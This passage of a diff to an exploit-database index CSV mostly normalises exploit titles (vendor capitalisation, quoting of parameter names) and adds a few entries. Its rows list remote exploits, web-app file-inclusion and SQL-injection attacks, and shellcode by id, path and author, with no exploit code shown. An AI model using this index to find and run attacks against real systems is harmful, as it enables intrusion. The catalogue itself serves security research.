Rojas",cgi,remote,0 39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0 39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",multiple,remote,0 -39089,platforms/hardware/remote/39089.txt,"Netgear D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 +39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 @@ -15538,7 +15539,7 @@ id,file,description,date,author,platform,type,port 39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0 39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,linux,remote,0 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80 -39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080 +39515,platforms/windows/remote/39515.rb,"NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080 39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443 @@ -15603,7 +15604,7 @@ id,file,description,date,author,platform,type,port 40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000 40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80 -40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 +40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0 40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0 @@ -15655,8 +15656,8 @@ id,file,description,date,author,platform,type,port 40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0 40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 40735,platforms/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 -40736,platforms/hardware/remote/40736.txt,"NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 -40737,platforms/hardware/remote/40737.sh,"NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 +40736,platforms/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 +40737,platforms/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 40738,platforms/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547 40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0 @@ -15711,7 +15712,7 @@ id,file,description,date,author,platform,type,port 41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0 41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0 41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0 -41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80 +41598,platforms/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80 41613,platforms/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,windows,remote,8800 41614,platforms/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,multiple,remote,8080 41638,platforms/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,windows,remote,0 @@ -15725,11 +15726,12 @@ id,file,description,date,author,platform,type,port 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 -42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 +42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0 42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251 42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0 +42779,platforms/linux/remote/42779.rb,"Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,linux,remote,9001 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0 @@ -15791,18 +15793,18 @@ id,file,description,date,author,platform,type,port 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0 42222,platforms/windows/remote/42222.py,"SpyCamLizard 1.230 - Buffer Overflow",2017-06-20,abatchy17,windows,remote,0 42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443 -42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80 +42257,platforms/cgi/remote/42257.rb,"NETGEAR DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80 42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000 42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0 42288,platforms/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0 -42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 +42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0 -42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0 +42331,platforms/hardware/remote/42331.txt,"Belkin F7D7601 NetCam - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0 42394,platforms/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",java,remote,0 42349,platforms/android/remote/42349.txt,"SKILLS.com.au Industry App - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0 42350,platforms/android/remote/42350.txt,"Virtual Postage (VPA) - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0 @@ -15826,7 +15828,7 @@ id,file,description,date,author,platform,type,port 42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",php,remote,0 42693,platforms/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0 42694,platforms/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824 -42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0 +42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0 42696,platforms/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,3814 42697,platforms/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",linux,remote,0 42698,platforms/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",jsp,remote,0 @@ -15847,7 +15849,9 @@ id,file,description,date,author,platform,type,port 42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69 42726,platforms/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote,0 42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor",2017-05-19,"Simon Brannstrom",multiple,remote,0 +42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80 42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80 +42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16903,7 +16907,7 @@ id,file,description,date,author,platform,type,port 1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' Parameter SQL Injection",2006-05-16,rgod,php,webapps,0 1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote Exploit",2006-05-16,rgod,php,webapps,0 -1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - (quezza_root_path) File Inclusion",2006-05-17,nukedx,php,webapps,0 +1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - 'quezza_root_path' File Inclusion",2006-05-17,nukedx,php,webapps,0 1800,platforms/php/webapps/1800.txt,"ScozNews 1.2.1 - 'mainpath' Remote File Inclusion",2006-05-17,Kacper,php,webapps,0 1804,platforms/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass",2006-05-19,[Oo],php,webapps,0 1805,platforms/php/webapps/1805.pl,"phpListPro 2.0.1 - 'Language' Remote Code Execution",2006-05-19,[Oo],php,webapps,0 @@ -16993,7 +16997,7 @@ id,file,description,date,author,platform,type,port 1907,platforms/php/webapps/1907.txt,"aWebNews 1.5 - 'visview.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 1908,platforms/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - 'phpbb_root_path' File Inclusion",2006-06-13,Kacper,php,webapps,0 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution",2006-06-13,"Javier Olascoaga",php,webapps,0 -1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - (destination) File Inclusion",2006-06-14,Kacper,php,webapps,0 +1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - 'destination' File Inclusion",2006-06-14,Kacper,php,webapps,0 1913,platforms/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - 'template.php' File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Parameter Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 @@ -17286,7 +17290,7 @@ id,file,description,date,author,platform,type,port 2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - (base) Remote File Inclusion",2006-09-08,ddoshomo,php,webapps,0 2336,platforms/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - (root_dir) Remote File Inclusion",2006-09-09,Kacper,php,webapps,0 2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - 'id' SQL Injection",2006-09-09,MercilessTurk,php,webapps,0 -2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - (classified_path) File Inclusion",2006-09-09,MercilessTurk,php,webapps,0 +2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - 'classified_path' File Inclusion",2006-09-09,MercilessTurk,php,webapps,0 2340,platforms/php/webapps/2340.txt,"PUMA 1.0 RC 2 - 'config.php' Remote File Inclusion",2006-09-10,"Philipp Niedziela",php,webapps,0 2341,platforms/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - 'ROOT_PATH' File Inclusion",2006-09-10,Eddy_BAck0o,php,webapps,0 2342,platforms/php/webapps/2342.txt,"mcGalleryPRO 2006 - (path_to_folder) Remote File Inclusion",2006-09-10,Solpot,php,webapps,0 @@ -17388,7 +17392,7 @@ id,file,description,date,author,platform,type,port 2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion",2006-09-29,Kacper,php,webapps,0 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - 'display.php' SQL Injection",2006-09-29,Trex,php,webapps,0 2457,platforms/php/webapps/2457.php,"UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution",2006-09-29,"HACKERS PAL",php,webapps,0 -2459,platforms/php/webapps/2459.txt,"Forum82 < 2.5.2b - (repertorylevel) Multiple File Inclusion",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 +2459,platforms/php/webapps/2459.txt,"Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusion",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - 'yesno.phtml' Remote File Inclusion",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion",2006-10-01,Kacper,php,webapps,0 @@ -17416,10 +17420,10 @@ id,file,description,date,author,platform,type,port 2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - 'moteur.php' Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 2491,platforms/php/webapps/2491.pl,"PHPPC 1.03 RC1 - '/lib/functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 2493,platforms/php/webapps/2493.pl,"docmint 2.0 - 'engine/require.php' Remote File Inclusion",2006-10-09,K-159,php,webapps,0 -2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 -2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 -2496,platforms/php/webapps/2496.txt,"WebYep 1.1.9 - (webyep_sIncludePath) File Inclusion",2006-10-09,the_day,php,webapps,0 -2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 +2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0 +2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0 +2496,platforms/php/webapps/2496.txt,"WebYep 1.1.9 - 'webyep_sIncludePath' File Inclusion",2006-10-09,the_day,php,webapps,0 +2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0 2498,platforms/php/webapps/2498.php,"Flatnuke 2.5.8 - 'file()' Privilege Escalation / Code Execution",2006-10-10,rgod,php,webapps,0 2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 - (userlang) Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0 2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - 'templates/header.php3' Local File Inclusion",2006-10-10,"Nima Salehi",php,webapps,0 @@ -17454,7 +17458,7 @@ id,file,description,date,author,platform,type,port 2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 - (lang_prefix) Remote File Inclusion",2006-10-12,r0ut3r,php,webapps,0 2535,platforms/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - 'menu.inc.php' File Inclusion",2006-10-13,k1tk4t,php,webapps,0 -2536,platforms/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - (fullpath) File Inclusion",2006-10-13,k1tk4t,php,webapps,0 +2536,platforms/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - 'fullpath' File Inclusion",2006-10-13,k1tk4t,php,webapps,0 2537,platforms/php/webapps/2537.pl,"maluinfo 206.2.38 - 'bb_usage_stats.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2538,platforms/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - 'constants.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2539,platforms/php/webapps/2539.txt,"Genepi 1.6 - 'genepi.php' Remote File Inclusion",2006-10-13,Kw3[R]Ln,php,webapps,0 @@ -17520,7 +17524,7 @@ id,file,description,date,author,platform,type,port 2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0 2613,platforms/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0 2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - 'DNS/RR.php' Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 -2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion",2006-10-22,k1tk4t,php,webapps,0 +2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion",2006-10-22,k1tk4t,php,webapps,0 2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - (Encyclopedia) SQL Injection",2006-10-22,Paisterist,php,webapps,0 2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - 'common.php' Remote File Inclusion",2006-10-22,"the master",php,webapps,0 @@ -17552,7 +17556,7 @@ id,file,description,date,author,platform,type,port 2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,php,webapps,0 2661,platforms/asp/webapps/2661.asp,"PHP League 0.82 - 'classement.php' SQL Injection",2006-10-27,ajann,asp,webapps,0 2662,platforms/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",asp,webapps,0 -2663,platforms/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - (PS_BASE) File Inclusion",2006-10-28,"Cold Zero",php,webapps,0 +2663,platforms/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion",2006-10-28,"Cold Zero",php,webapps,0 2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - 'viewticket.php' Local File Inclusion",2006-10-28,Kw3[R]Ln,php,webapps,0 2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - 'Core/core.inc.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 @@ -17638,7 +17642,7 @@ id,file,description,date,author,platform,type,port 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - 'save_profile.asp' Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 -2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Inclusion",2006-11-13,Firewall,php,webapps,0 +2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,php,webapps,0 2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion",2006-11-14,navairum,php,webapps,0 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - 'Inspect.php' Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 @@ -17852,7 +17856,7 @@ id,file,description,date,author,platform,type,port 3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",php,webapps,0 3096,platforms/php/webapps/3096.txt,"AllMyLinks 0.5.0 - 'index.php' Remote File Inclusion",2007-01-07,GoLd_M,php,webapps,0 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - 'index.php' Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0 -3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - _config[site_path] File Inclusion",2007-01-08,k1tk4t,php,webapps,0 +3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - '_config[site_path]' File Inclusion",2007-01-08,k1tk4t,php,webapps,0 3103,platforms/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution",2007-01-08,DarkFig,php,webapps,0 3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0 @@ -25190,7 +25194,7 @@ id,file,description,date,author,platform,type,port 16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0 16250,platforms/php/webapps/16250.txt,"WordPress Plugin jQuery Mega Menu 1.0 - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 16251,platforms/php/webapps/16251.txt,"WordPress Plugin OPS Old Post Spinner 2.2.1 - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 -16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",hardware,webapps,0 +16252,platforms/hardware/webapps/16252.html,"Cisco Linksys WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",hardware,webapps,0 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injections",2011-02-28,AtT4CKxT3rR0r1ST,php,webapps,0 16257,platforms/php/webapps/16257.txt,"SnapProof - 'page.php' SQL Injection",2011-02-28,AtT4CKxT3rR0r1ST,php,webapps,0 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script - SQL Injection",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 @@ -25429,7 +25433,7 @@ id,file,description,date,author,platform,type,port 17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0 17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload",2011-05-30,"Treasure 